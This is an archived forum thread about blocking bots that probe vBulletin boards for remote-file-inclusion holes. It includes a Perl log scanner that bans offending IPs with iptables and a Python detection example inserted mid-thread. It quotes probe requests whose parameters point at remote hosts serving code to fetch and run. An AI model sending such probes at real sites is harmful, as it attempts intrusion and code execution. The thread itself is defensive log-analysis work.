vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   Big Board Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=172)
-   -   Load Relief: Block the sniffers (https://vborg.vbsupport.ru/showthread.php?t=165477)

Jafo232 12-18-2007 04:32 PM

Load Relief: Block the sniffers
 
If you have ever perused your logs on your big board, or any board for that matter, chances are you have seen requests like this:

Code:

/forums/showthread.php?t=http://somehackersite-usually-russian.ru/images/cs.txt?
Basically, there must have been some vulnerability in some version of VB that would probably execute whatever code is at somehackersite-usually-russian.ru/images/cs.txt, or at least display it in a user's browser.

For the most part, these have been ferreted out by the VB team, so it really isn't much to be worried about as far as security. These are just bots hitting known VB installs trying to recruit machines for some idiot's nefarious dealings. If you watch your log in real time, however, you can see that this happens over and over: multiple IPs from multiple locations. Basically, every time they hit the site, it creates load on the server.

This really annoys me because, seriously, it is a waste of resources for not just me but the hackers themselves. So finally I fired up my Perl scripting and wrote up something that searched the webserver log (access_log) and, if it found any attempt to grab a thread starting with http://, just banned the IP via iptables. Here is a snippet:

Code:

use strict;
use warnings;

# Read the whole access_log into memory; fine for a log that is rotated regularly
open(my $fh, '<', '/home/mysite/logs/access_log') or die "access_log: $!";
my @log = <$fh>;
close $fh;

foreach (@log) {
    # The probe: ?t= carries a remote URL instead of a numeric thread id
    if ($_ =~ m/showthread\.php\?t=http:\/\//) {
        # parse out and find IP (first field of a common-log-format line),
        # ban IP (unless it is mine, or in my range).
        my ($ipaddress) = /^(\d{1,3}(?:\.\d{1,3}){3})\s/;
    }
}

I won't post the entire code here, but basically it saves the IPs that it bans to an array, serializes it and saves it. It loads that upon script execution, unserializes it, and if a hack attempt is found in the log and the IP is not in the array, it proceeds to ban the IP with a drop:

Code:

# list-form system() so $ipaddress (taken from the log) is never handed to a shell
my $ban = system('/sbin/iptables', '-I', 'INPUT', '-s', $ipaddress, '-j', 'DROP');
I ran this via a cronjob every 15 minutes, and over the last 5 days I have banned over 600 IP addresses. Most of these are compromised machines, I assume. Watching the logs, I see fewer and fewer hack attempts. The load on the server in question has dropped noticeably. Most of the time, this server's 30-minute average hovered around 0.50 - 0.60; it is now around 0.30 - 0.40.

Of course, the server could just be experiencing a slow week, but the numbers don't really indicate that.

I am considering redoing the script so I can release it to everyone free, it is just cobbled together at the moment so I don't really want to put it up yet.

Has anyone else here run into the same issues? Would anyone here be interested in the Perl script?
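The detection the post describes, worked out as an added example (this is not Jafo232's Perl script, and it is written in Python rather than Perl): parse Apache-style access_log lines, flag any request whose query string hands a script a remote URL as a parameter value, skip IPs that are already banned or inside an operator-owned range, and produce the iptables command for each new offender. It generalises the post's `showthread.php?t=http://` match to every script and parameter (so the `groups.php?g=http://...` hits reported later in the thread are caught too) and to percent-encoded and upper-case `HTTP://` variants. The log lines, the allowed network 192.168.1.0/24 and the `/sbin/iptables` path are constructed for the example.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample of Apache combined-log lines; not taken from the original post.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Dec/2007:10:01:02 +0000] "GET /forums/showthread.php?t=http://somehackersite-usually-russian.ru/images/cs.txt? HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"
198.51.100.23 - - [18/Dec/2007:10:01:05 +0000] "GET /forums/showthread.php?t=165477 HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Dec/2007:10:02:11 +0000] "GET /groups/groups.php?g=http://migirlsadaoiwqiseatmeisum.mail333.su/body? HTTP/1.1" 404 312 "-" "Mozilla/4.0"
192.168.1.50 - - [18/Dec/2007:10:03:00 +0000] "GET /forums/showthread.php?t=http://evil.example/x.txt? HTTP/1.1" 200 5123 "-" "curl/7.16"
203.0.113.7 - - [18/Dec/2007:10:04:44 +0000] "GET /forums/showthread.php?t=HTTP://somehackersite-usually-russian.ru/images/cs.txt? HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"
203.0.113.10 - - [18/Dec/2007:10:05:01 +0000] "GET /forums/showthread.php?t=http%3A%2F%2Fevil.example%2Fcs.txt%3F HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
"""

# client IP, then the request line: "METHOD target HTTP/x.y"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
# A parameter value that is itself a remote URL is the signature of these RFI probes.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def is_rfi_probe(target: str) -> bool:
    """True if any query parameter of the request target carries a remote URL.

    parse_qsl percent-decodes values, so t=http%3A%2F%2F... is caught as well.
    """
    query = urlsplit(target).query
    for _key, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value.lstrip()):
            return True
    return False


def plan_bans(log_text, already_banned=frozenset(), allow_nets=()):
    """Return (new IPs to ban, {ip: probe count}) for the given log text.

    already_banned: IPs banned on an earlier run (the post's serialised array).
    allow_nets: CIDR strings for the operator's own ranges, never banned.
    """
    allow = [ipaddress.ip_network(net) for net in allow_nets]
    hits = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_rfi_probe(m["target"]):
            continue
        hits[m["ip"]] = hits.get(m["ip"], 0) + 1

    new_bans = []
    for ip in sorted(hits):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:  # hostname or garbage in the client field; skip it
            continue
        if ip in already_banned or any(addr in net for net in allow):
            continue
        new_bans.append(ip)
    return new_bans, hits


def iptables_cmd(ip: str) -> list:
    """argv for the DROP rule; a list, so the log-derived IP never reaches a shell."""
    return ["/sbin/iptables", "-I", "INPUT", "-s", ip, "-j", "DROP"]


if __name__ == "__main__":
    new, hits = plan_bans(
        SAMPLE_LOG, already_banned={"203.0.113.9"}, allow_nets=("192.168.1.0/24",)
    )
    for ip in new:
        print(hits[ip], "probe(s):", " ".join(iptables_cmd(ip)))
```

The ban command is built as an argv list rather than a shell string, and the IP is validated with `ipaddress` first, because the value comes straight from an attacker-controlled log field; the script only prints the commands, so running it against a real log is a dry run until you pass them to `subprocess.run`.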

Jafo232 12-20-2007 10:39 AM

Just an update on this... I had to modify my code a bit because for some reason, I set a threshold of 5 offenses by an IP before it would ban them. It was something I had in another application of mine that I carried into it. Now I ban on the first offense.

So far over the last 7 days, 1,259 drops issued to iptables. Load throughout the day continues to drop.

howard30 12-21-2007 11:23 AM

Cool! I like the sound of this. Not that I own a big board, but hey, it would help to put it on before it gets to the point you were at, no?

UncoderMom 12-22-2007 03:47 PM

I see that kind of link a lot but with my groups :eek:

example:

Attachment 73592

I've seen them a lot this past 2 weeks but only in my groups.. hmmmmm

UncoderMom 12-22-2007 03:47 PM

one was a .text too.

--------------- Added 12-22-2007 08:53 PM ---------------

and yet another one just now! AGH!

Code:

Guest
Viewing Error Message /groups/groups.php?g=http://migirlsadaoiwqiseatmeisum.mail333.su/body? Unknown Location
/groups/groups.php?g=http://migirlsadaoiwqiseatmeisum.mail333.su/body?

Are they trying to hack or use my mail system??

Jafo232 12-23-2007 01:43 AM

They are just bots scouring the net looking for vulnerabilities so they can exploit them. There is no one person sitting there clicking.

If your software is up to date, chances are, you have nothing to worry about.

UncoderMom 12-23-2007 04:17 AM

Thanks!

EricGT 12-25-2007 03:08 AM

A good firewall blocks this sort of attempted exploit automatically. I use Astaro and it blocks 70,000 or more exploits/attacks/probes daily. This is a great system and I sleep a little easier at night. Eric

Jafo232 12-26-2007 07:52 AM

Quote:

Originally Posted by EricGT (Post 1408718)
A good firewall blocks this sort of attempted exploit automatically. I use Astaro and it blocks 70,000 or more exploits/attacks/probes daily. This is a great system and I sleep a little easier at night. Eric

Your firewall isn't going to protect your site against such an attack as the firewall has port 80 open, otherwise it would not be serving pages.

If you are serving data dynamically, of course there is a chance someone could hack your system, which is why there are patches for software.

kmike 12-26-2007 11:26 AM

Methinks the load drop may have more to do with the Christmas season traffic lull than with the banning of these IP addresses...


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
